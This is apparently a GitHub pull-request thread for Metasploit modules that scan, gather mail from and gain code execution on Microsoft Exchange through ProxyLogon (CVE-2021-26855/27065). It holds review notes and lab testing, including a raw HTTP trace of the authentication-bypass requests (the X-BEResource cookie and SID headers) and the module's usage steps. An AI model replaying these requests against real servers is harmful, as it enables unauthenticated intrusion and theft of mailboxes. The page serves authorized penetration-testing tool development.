-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
add. Auxiliary/Exploit Scanner/Gather/RCE for Exchange ProxyLogon (CVE-2021-26855) #14860
add. Auxiliary/Exploit Scanner/Gather/RCE for Exchange ProxyLogon (CVE-2021-26855) #14860
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please resolve msftidy and rubocop errors:
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [INFO] No CVE references found. Please check before you land!
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [ERROR] Module should not be executable (+x)
== modules/auxiliary/scanner/http/exchange_proxylogon.rb ==
C: 12: 22: [Correctable] Layout/ModuleHashOnNewLine: update_info should start on its own line
C: 12: 23: [Correctable] Layout/ModuleHashOnNewLine: info should start on its own line
C: 25: 7: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C: 43: 24: [Correctable] Layout/ModuleHashOnNewLine: A new line is missing
C: 46: 24: [Correctable] Layout/FirstArrayElementIndentation: Use 2 spaces for indentation in an array, relative to the start of the line where the left square bracket is.
C: 47: 22: [Correctable] Layout/FirstArrayElementIndentation: Indent the right bracket the same as the start of the line where the left bracket is.
1 file inspected, 6 offenses detected, 6 offenses auto-correctable
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/auxiliary/scanner/http/exchange_proxylogon.rb and verify all issues are resolved
Please also run |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for this great contribution @mekhalleh! I just left a few minor comments, when you got a chance.
documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md
Outdated
Show resolved
Hide resolved
documentation/modules/auxiliary/scanner/http/exchange_proxylogon.md
Outdated
Show resolved
Hide resolved
I was not able to make the module grab emails and contacts from Exchange 2016 CU12 Version 15.1 (Build 1713.5) I'm getting an Here is the response I got: <?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Header>
<h:ServerVersionInfo xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types" xmlns="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" MajorVersion="15" MinorVersion="1" MajorBuildNumber="1713" MinorBuildNumber="5"/>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<m:GetFolderResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:ResponseMessages>
<m:GetFolderResponseMessage ResponseClass="Error">
<m:MessageText>Access is denied. Check credentials and try again., </m:MessageText>
<m:ResponseCode>ErrorAccessDenied</m:ResponseCode>
<m:DescriptiveLinkKey>0</m:DescriptiveLinkKey>
<m:Folders/>
</m:GetFolderResponseMessage>
</m:ResponseMessages>
</m:GetFolderResponse>
</s:Body>
</s:Envelope> |
documentation/modules/auxiliary/scanner/http/exchange_proxylogon.md
Outdated
Show resolved
Hide resolved
documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md
Outdated
Show resolved
Hide resolved
You need have two vulnerable Exchange server to check the exploitation. My lab is: Work with the collector module:
** Note: You can too inverse You got this message (
The module is based on this second option. |
Thank you so much! |
you can already do that with msf scripting resources with known path list from file to brute the path. But maybe it is possible to find a local path disclosure. I don't know.
|
Just add new option |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for updating the code @mekhalleh. I just did a last round of review and added a some comments.
Particularly, the issue with oab_id
throwing a NoMethodError
was breaking the exploit for me. Please, let me know if you have any questions.
documentation/modules/exploit/windows/http/exchange_proxylogon_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/windows/http/exchange_proxylogon_rce.md
Outdated
Show resolved
Hide resolved
@cdelafuente-r7 nice.. it's done ;) |
@cdelafuente-r7, in the last update, I added and fixed a lot of stuff ... RCE moduleStarted with the missing options for web delivery. But now there is no more need for this, I have added Powershell. Regarding the IIS path, I added the option I'm just redoing a commit to remove a reference to Know issue
Collector moduleI've add a check who detect if the internal server targeted is alive. |
Hello @cdelafuente-r7, I'm ready to land;) if you don't have any other comments. |
@mekhalleh I pulled your latest, both my issues remain. Proxy is still required to do the check and the exploit fails on the OAB-id request. I'm using a fresh lab build of Exchange 2016 x64 on Server 2012R2 where AD is on another server. The exchange write path and base path are correct with their defaults values. |
@mkunz-sec I use 2 different env of metasploit framework. First env, based on BlackArch package and second is my develop env (on Ubuntu Linux). On the 2 env I've not trouble about proxy. Maybe you have issue with your framework. I think @cdelafuente-r7 would have warned me about that. But if you want to send me the traces that I am looking at or it fails ;) With proxy and without proxy. Use |
@mkunz-sec and if you want test this : https://github.com/mekhalleh/exchange_proxylogon/blob/develop/exchange_proxylogon_rce.rb |
If you are using the latest version of the module, you no longer need web delivrery. Now this use Powershell oneliner stager. Also look at known issues, especially number 2 (#14860 (comment)) Depending on the payload used, two cmd.exe processes remain alive on the server. If this is the case, you cannot make another attempt if they are not killed ... But for your proxy problem? I do not know. |
@cdelafuente-r7 There is a test that I cannot perform on my lab, because I cannot test method 2 to take the canary. But if you feel like doing it. The context is as follows: Create user mailbox and connect to that. Run the module on targeted user mailbox. If you have the following message: replace all occurrence of:
by
and re-run the module. And let me know if it works. Thanks by advance ;) |
I got the same message with a user email time zone both set and not set. Changing the code to use the static sid prefix gave the same you need to login as administrator@tech.com (I'm targeting user@tech.com) and set a time zone. Setting a timezone for both administrator and my user account gave this error with the code change. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the updates and for the latest addition @mekhalleh ! I tested the new Powershell target and it works great!
I just left a few comments for the last round of review.
As requested, I tested the second method to get the canary with an non-admin email. I got a slightly different error (access denied). Changing the SID to S-1-5-20
give me the same error:
[*] Try to get a good msExchCanary (without correcting the user SID)
####################
# Request:
####################
POST /ecp/ws.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/proxyLogon.ecp?a=~2145660510;
msExchLogonMailbox: S-1-5-20
msExchTargetMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 91
<r at="Negotiate" ln="TestUserN1"><s>S-1-5-21-<redacted>-<redacted>-<redacted>-1114</s></r>
####################
# Response:
####################
HTTP/1.1 241
Cache-Control: private
Server: Microsoft-IIS/10.0
request-id: 6d866e85-c28c-4b7f-8bbb-7069f704c9fd
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ad7b3f3a-f3c1-4b92-8637-b8a4e4567632; path=/; secure; HttpOnly, msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.; path=/ecp
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Mon, 22 Mar 2021 15:55:21 GMT
Content-Length: 0
####################
# Request:
####################
POST /ecp/ws.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.&a=~2068268331; ASP.NET_SessionId=ad7b3f3a-f3c1-4b92-8637-b8a4e4567632; msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.;
msExchLogonMailbox: S-1-5-20
msExchTargetMailbox: S-1-5-20
Content-Type: application/json; charset=utf-8
Content-Length: 159
{"filter":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","SelectedView":"","SelectedVDirType":"OAB"}},"sort":{}}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
request-id: 44fd24a5-4ebc-4314-bcbb-3d9dc1593efc
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-ECP-ERROR: Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException
jsonerror: true
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Mon, 22 Mar 2021 15:55:21 GMT
Content-Length: 2125
{"Message":"Your request couldn't be completed. Please try again, and if the problem persists, contact your administrator.","ExceptionDetail":{"HelpLink":null,"InnerException":null,"Message":"You don't have permission to open this page. If you're a new user or were recently assigned credentials, please wait 15 minutes and try again.","StackTrace":" at Microsoft.Exchange.Management.DDIService.CmdletActivity.IsRunnable(DataRow input, DataTable dataTable, DataObjectStore store)\u000d\u000a at Microsoft.Exchange.Management.DDIService.BranchActivity.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a at Microsoft.Exchange.Management.DDIService.Workflow.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a at Microsoft.Exchange.Management.DDIService.WSListDataHandler.ExecuteCore(Workflow workflow)\u000d\u000a at Microsoft.Exchange.Management.DDIService.WSDataHandler.Execute()\u000d\u000a at Microsoft.Exchange.Management.DDIService.DDIServiceHelper.GetListCommon(DDIParameters filter, SortOptions sort, Boolean forGetProgress)\u000d\u000a at Microsoft.Exchange.Management.DDIService.DDIService.GetList(DDIParameters filter, SortOptions sort)\u000d\u000a at SyncInvokeGetList(Object , Object[] , Object[] )\u000d\u000a at System.ServiceModel.Dispatcher.SyncMethodInvoker.Invoke(Object instance, Object[] inputs, Object[]& outputs)\u000d\u000a at System.ServiceModel.Dispatcher.DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc)\u000d\u000a at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc)\u000d\u000a at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage11(MessageRpc& rpc)\u000d\u000a at System.ServiceModel.Dispatcher.MessageRpc.Process(Boolean isOperationContextSet)","Type":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException"},"ExceptionType":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException","StackTrace":null}
[-] Exploit aborted due to failure: not-found: No 'OAB Id' was found
[*] Exploit completed, but no session was created.
Also, would you mind adding your comment about the RCE module (known issues, etc.) to the module documentation? I think it is a very valuable information and it will probably be lost in this PR thread.
If you don't have anything to add to this PR, I think we're good to land once the last round of comments are addressed.
I tested again, it works.
All is done ;) it was very interesting and a bit complicated too ... doing blind things like patching SID was not easy. @cdelafuente-r7, very thank for your help ;) |
Thank you for this great contribution @mekhalleh and for being so responsive. It was a pleasure to work with you on these exploits. I re-tested the 3 modules and everything looks fine. I just need to fix some minor issues that Rubocop reports on the up-to-date One last feedback for the next contributions (I hope there will be soon!). It is recommended to submit only one module per pull request. It is usually faster to land since we don't have to wait for every module to be ready. In this case, both auxiliary modules could have been landed before the RCE. Example output (Exchange 2016 CU12 on Windows Server 2016)Scanner module (exchange_proxylogon)
Auxiliary module (exchange_proxylogon_collector)
RCE exploit module (exchange_proxylogon_rce)
|
Original Release NotesThis adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:
|
Release NotesNew module New module New module |
Introduction
An issue was discovered in Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By chaining this bug with another
post-auth arbitrary-file-write vulnerability to get code execution (CVE-2021-27065).
As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server.
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013,
Exchange 2019 CU8 < 15.02.0792.010).
All components are vulnerable by default.
Verification Steps
use auxiliary/scanner/http/exchange_proxylogon
set RHOSTS [IP]
run
Options
METHOD
. HTTP Method to use (for CVE-2021-26855). Default:POST
Proxies
. This option is not set by default.RPORT
. The default setting is443
. To use:set RPORT [PORT]
SSL
. The default setting istrue
.THREADS
. The default setting is1
.VHOST
. This option is not set by default.Scenarios
References